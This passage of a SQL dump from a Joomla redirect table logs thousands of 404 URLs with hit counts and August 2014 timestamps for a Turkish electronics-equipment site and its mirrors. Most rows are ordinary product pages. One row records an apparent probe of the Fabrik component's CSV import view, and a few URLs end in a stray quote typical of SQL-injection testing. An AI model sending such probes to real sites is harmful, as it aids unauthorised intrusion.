21:18:54','0000-00-00 00:00:00',301),(2018,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',25,0,'2014-08-08 21:32:47','0000-00-00 00:00:00',301),(2019,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',2,0,'2014-08-08 21:33:35','0000-00-00 00:00:00',301),(2020,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',3,0,'2014-08-08 21:34:17','0000-00-00 00:00:00',301),(2021,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',3,0,'2014-08-08 21:40:17','0000-00-00 00:00:00',301),(2022,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',8,0,'2014-08-08 21:42:35','0000-00-00 00:00:00',301),(2023,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',7,0,'2014-08-08 22:09:45','0000-00-00 00:00:00',301),(2024,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',2,0,'2014-08-08 22:15:16','0000-00-00 00:00:00',301),(2025,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=122&Itemid=129&lang=tr','','','',1,0,'2014-08-08 22:27:12','0000-00-00 00:00:00',301),(2026,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr&limitstart=5','','','',1,0,'2014-08-08 22:36:15','0000-00-00 00:00:00',301),(2027,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',58,0,'2014-08-08 22:38:45','0000-00-00 00:00:00',301),(2028,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=tr','','','',5,0,'2014-08-08 22:43:45','0000-00-00 00:00:00',301),(2029,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=&lang=tr','','','',1,0,'2014-08-08 22:44:37','0000-00-00 00:00:00',301),(2030,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157','','','',1,0,'2014-08-08 22:44:42','0000-00-00 00:00:00',301),(2031,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',1,0,'2014-08-08 22:46:49','0000-00-00 00:00:00',301),(2032,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',9,0,'2014-08-08 22:48:29','0000-00-00 00:00:00',301),(2033,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',2,0,'2014-08-08 22:49:34','0000-00-00 00:00:00',301),(2034,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',2,0,'2014-08-08 22:52:54','0000-00-00 00:00:00',301),(2035,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',1,0,'2014-08-08 23:01:32','0000-00-00 00:00:00',301),(2036,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',1,0,'2014-08-08 23:04:51','0000-00-00 00:00:00',301),(2037,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',2,0,'2014-08-08 23:06:24','0000-00-00 00:00:00',301),(2038,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',6,0,'2014-08-08 23:08:15','0000-00-00 00:00:00',301),(2039,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',8,0,'2014-08-08 23:09:14','0000-00-00 00:00:00',301),(2040,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=&lang=en','','','',1,0,'2014-08-08 23:39:31','0000-00-00 00:00:00',301),(2041,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',2,0,'2014-08-08 23:45:41','0000-00-00 00:00:00',301),(2042,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',8,0,'2014-08-08 23:55:43','0000-00-00 00:00:00',301),(2043,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',3,0,'2014-08-09 00:09:08','0000-00-00 00:00:00',301),(2044,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',10,0,'2014-08-09 00:10:26','0000-00-00 00:00:00',301),(2045,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',4,0,'2014-08-09 00:11:01','0000-00-00 00:00:00',301),(2046,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','','',14,0,'2014-08-09 00:13:36','0000-00-00 00:00:00',301),(2047,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',2,0,'2014-08-09 00:15:40','0000-00-00 00:00:00',301),(2048,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',6,0,'2014-08-09 00:16:03','0000-00-00 00:00:00',301),(2049,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',4,0,'2014-08-09 00:20:35','0000-00-00 00:00:00',301),(2050,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en\'','','','',1,0,'2014-08-09 00:32:33','0000-00-00 00:00:00',301),(2051,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',8,0,'2014-08-09 00:43:14','0000-00-00 00:00:00',301),(2052,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',24,0,'2014-08-09 00:45:55','0000-00-00 00:00:00',301),(2053,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=tr','','','',3,0,'2014-08-09 01:01:18','0000-00-00 00:00:00',301),(2054,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',5,0,'2014-08-09 01:08:07','0000-00-00 00:00:00',301),(2055,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',26,0,'2014-08-09 01:10:40','0000-00-00 00:00:00',301),(2056,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',55,0,'2014-08-09 01:11:15','0000-00-00 00:00:00',301),(2057,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',3,0,'2014-08-09 01:39:36','0000-00-00 00:00:00',301),(2058,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=0&lang=en','','','',1,0,'2014-08-09 01:42:05','0000-00-00 00:00:00',301),(2059,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',3,0,'2014-08-09 01:42:52','0000-00-00 00:00:00',301),(2060,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',6,0,'2014-08-09 01:56:25','0000-00-00 00:00:00',301),(2061,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',3,0,'2014-08-09 01:58:28','0000-00-00 00:00:00',301),(2062,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',3,0,'2014-08-09 02:12:12','0000-00-00 00:00:00',301),(2063,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',29,0,'2014-08-09 02:29:40','0000-00-00 00:00:00',301),(2064,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=tr','','','',7,0,'2014-08-09 02:30:17','0000-00-00 00:00:00',301),(2065,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',14,0,'2014-08-09 02:32:15','0000-00-00 00:00:00',301),(2066,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',8,0,'2014-08-09 02:38:31','0000-00-00 00:00:00',301),(2067,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',7,0,'2014-08-09 02:42:38','0000-00-00 00:00:00',301),(2068,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',18,0,'2014-08-09 02:46:43','0000-00-00 00:00:00',301),(2069,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=152&Itemid=153&lang=tr','','','',4,0,'2014-08-09 03:04:48','0000-00-00 00:00:00',301),(2070,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',5,0,'2014-08-09 03:49:00','0000-00-00 00:00:00',301),(2071,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',5,0,'2014-08-09 04:02:23','0000-00-00 00:00:00',301),(2072,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',8,0,'2014-08-09 04:18:31','0000-00-00 00:00:00',301),(2073,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',11,0,'2014-08-09 04:22:39','0000-00-00 00:00:00',301),(2074,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=&lang=en','','','',1,0,'2014-08-09 04:28:24','0000-00-00 00:00:00',301),(2075,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',29,0,'2014-08-09 04:38:54','0000-00-00 00:00:00',301),(2076,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',3,0,'2014-08-09 04:57:26','0000-00-00 00:00:00',301),(2077,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=&lang=en','','','',1,0,'2014-08-09 05:09:48','0000-00-00 00:00:00',301),(2078,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',5,0,'2014-08-09 05:14:16','0000-00-00 00:00:00',301),(2079,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',1,0,'2014-08-09 05:16:31','0000-00-00 00:00:00',301),(2080,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',6,0,'2014-08-09 05:21:40','0000-00-00 00:00:00',301),(2081,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',2,0,'2014-08-09 05:29:09','0000-00-00 00:00:00',301),(2082,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',7,0,'2014-08-09 05:36:57','0000-00-00 00:00:00',301),(2083,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',3,0,'2014-08-09 05:41:47','0000-00-00 00:00:00',301),(2084,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',2,0,'2014-08-09 06:02:06','0000-00-00 00:00:00',301),(2085,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',11,0,'2014-08-09 06:21:58','0000-00-00 00:00:00',301),(2086,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',3,0,'2014-08-09 06:37:57','0000-00-00 00:00:00',301),(2087,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',3,0,'2014-08-09 06:44:54','0000-00-00 00:00:00',301),(2088,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=47&Itemid=0&lang=tr','','','',1,0,'2014-08-09 06:48:25','0000-00-00 00:00:00',301),(2089,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',10,0,'2014-08-09 07:11:31','0000-00-00 00:00:00',301),(2090,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107&lang=tr','','','',3,0,'2014-08-09 07:11:51','0000-00-00 00:00:00',301),(2091,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',6,0,'2014-08-09 07:17:38','0000-00-00 00:00:00',301),(2092,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89&Itemid=101&lang=tr','','','',4,0,'2014-08-09 07:19:09','0000-00-00 00:00:00',301),(2093,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',2,0,'2014-08-09 07:23:19','0000-00-00 00:00:00',301),(2094,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',10,0,'2014-08-09 07:28:51','0000-00-00 00:00:00',301),(2095,'http://www.3s-technologies.com.tr/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1','','','',1,0,'2014-08-09 08:10:48','0000-00-00 00:00:00',301),(2096,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',4,0,'2014-08-09 08:13:21','0000-00-00 00:00:00',301),(2097,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',4,0,'2014-08-09 08:27:01','0000-00-00 00:00:00',301),(2098,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=tr','','','',4,0,'2014-08-09 08:30:03','0000-00-00 00:00:00',301),(2099,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=en','','','',8,0,'2014-08-09 08:31:33','0000-00-00 00:00:00',301),(2100,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',53,0,'2014-08-09 08:42:39','0000-00-00 00:00:00',301),(2101,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',12,0,'2014-08-09 09:11:40','0000-00-00 00:00:00',301),(2102,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=&lang=en','','','',1,0,'2014-08-09 09:42:31','0000-00-00 00:00:00',301),(2103,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',13,0,'2014-08-09 10:04:39','0000-00-00 00:00:00',301),(2104,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',5,0,'2014-08-09 10:25:11','0000-00-00 00:00:00',301),(2105,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',4,0,'2014-08-09 10:27:46','0000-00-00 00:00:00',301),(2106,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',2,0,'2014-08-09 11:00:52','0000-00-00 00:00:00',301),(2107,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',41,0,'2014-08-09 11:04:20','0000-00-00 00:00:00',301),(2108,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',5,0,'2014-08-09 11:07:22','0000-00-00 00:00:00',301),(2109,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',7,0,'2014-08-09 11:09:19','0000-00-00 00:00:00',301),(2110,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',5,0,'2014-08-09 11:17:52','0000-00-00 00:00:00',301),(2111,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=0&lang=en','','','',1,0,'2014-08-09 12:09:16','0000-00-00 00:00:00',301),(2112,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',1,0,'2014-08-09 12:49:13','0000-00-00 00:00:00',301),(2113,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127&lang=tr','','','',6,0,'2014-08-09 13:07:47','0000-00-00 00:00:00',301),(2114,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',3,0,'2014-08-09 13:12:18','0000-00-00 00:00:00',301),(2115,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en\'','','','',1,0,'2014-08-09 13:38:49','0000-00-00 00:00:00',301),(2116,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164\'','','','',1,0,'2014-08-09 13:38:49','0000-00-00 00:00:00',301),(2117,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129&lang=tr','','','',2,0,'2014-08-09 14:31:26','0000-00-00 00:00:00',301),(2118,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-08-09 14:47:54','0000-00-00 00:00:00',301),(2119,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',8,0,'2014-08-09 15:32:36','0000-00-00 00:00:00',301),(2120,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=0&lang=tr','','','',1,0,'2014-08-09 15:40:53','0000-00-00 00:00:00',301),(2121,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',4,0,'2014-08-09 15:41:48','0000-00-00 00:00:00',301),(2122,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=0&lang=tr','','','',1,0,'2014-08-09 15:46:02','0000-00-00 00:00:00',301),(2123,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',2,0,'2014-08-09 15:54:24','0000-00-00 00:00:00',301),(2124,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=&lang=en','','','',1,0,'2014-08-09 16:06:50','0000-00-00 00:00:00',301),(2125,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=39&Itemid=0&lang=tr','','','',1,0,'2014-08-09 16:29:07','0000-00-00 00:00:00',301),(2126,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',6,0,'2014-08-09 16:32:06','0000-00-00 00:00:00',301),(2127,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',2,0,'2014-08-09 17:05:47','0000-00-00 00:00:00',301),(2128,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',1,0,'2014-08-09 17:09:12','0000-00-00 00:00:00',301),(2129,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',3,0,'2014-08-09 17:41:46','0000-00-00 00:00:00',301),(2130,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',2,0,'2014-08-09 17:43:00','0000-00-00 00:00:00',301),(2131,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',16,0,'2014-08-09 17:53:28','0000-00-00 00:00:00',301),(2132,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=0&lang=en','','','',1,0,'2014-08-09 18:08:54','0000-00-00 00:00:00',301),(2133,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',1,0,'2014-08-09 18:13:25','0000-00-00 00:00:00',301),(2134,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',5,0,'2014-08-09 18:17:57','0000-00-00 00:00:00',301),(2135,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',9,0,'2014-08-09 18:19:03','0000-00-00 00:00:00',301),(2136,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',3,0,'2014-08-09 18:24:45','0000-00-00 00:00:00',301),(2137,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=&lang=tr','','','',1,0,'2014-08-09 18:28:48','0000-00-00 00:00:00',301),(2138,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126&lang=tr','','','',4,0,'2014-08-09 18:48:02','0000-00-00 00:00:00',301),(2139,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/lehimleme-hakk-nda','','','',1,0,'2014-08-09 19:08:13','0000-00-00 00:00:00',301),(2140,'http://www.3s-technologies.com.tr/index.php/en/component/content/category/81-english-uk/english-content','','','',46,0,'2014-08-09 19:23:52','0000-00-00 00:00:00',301),(2141,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',6,0,'2014-08-09 19:26:46','0000-00-00 00:00:00',301),(2142,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',5,0,'2014-08-09 19:53:25','0000-00-00 00:00:00',301),(2143,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',4,0,'2014-08-09 19:55:25','0000-00-00 00:00:00',301),(2144,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',1,0,'2014-08-09 20:05:43','0000-00-00 00:00:00',301),(2145,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',11,0,'2014-08-09 20:18:26','0000-00-00 00:00:00',301),(2146,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',3,0,'2014-08-09 20:37:51','0000-00-00 00:00:00',301),(2147,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',9,0,'2014-08-09 21:01:04','0000-00-00 00:00:00',301),(2148,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',8,0,'2014-08-09 21:07:50','0000-00-00 00:00:00',301),(2149,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',11,0,'2014-08-09 21:14:59','0000-00-00 00:00:00',301),(2150,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',1,0,'2014-08-09 21:16:33','0000-00-00 00:00:00',301),(2151,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',54,0,'2014-08-09 21:17:08','0000-00-00 00:00:00',301),(2152,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',7,0,'2014-08-09 21:31:21','0000-00-00 00:00:00',301),(2153,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',5,0,'2014-08-09 21:33:51','0000-00-00 00:00:00',301),(2154,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',1,0,'2014-08-09 21:43:22','0000-00-00 00:00:00',301),(2155,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=&lang=tr','','','',1,0,'2014-08-09 22:10:56','0000-00-00 00:00:00',301),(2156,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-09 22:30:54','0000-00-00 00:00:00',301),(2157,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',3,0,'2014-08-09 22:32:23','0000-00-00 00:00:00',301),(2158,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',3,0,'2014-08-09 22:39:24','0000-00-00 00:00:00',301),(2159,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',6,0,'2014-08-09 23:10:13','0000-00-00 00:00:00',301),(2160,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',8,0,'2014-08-09 23:18:10','0000-00-00 00:00:00',301),(2161,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',1,0,'2014-08-09 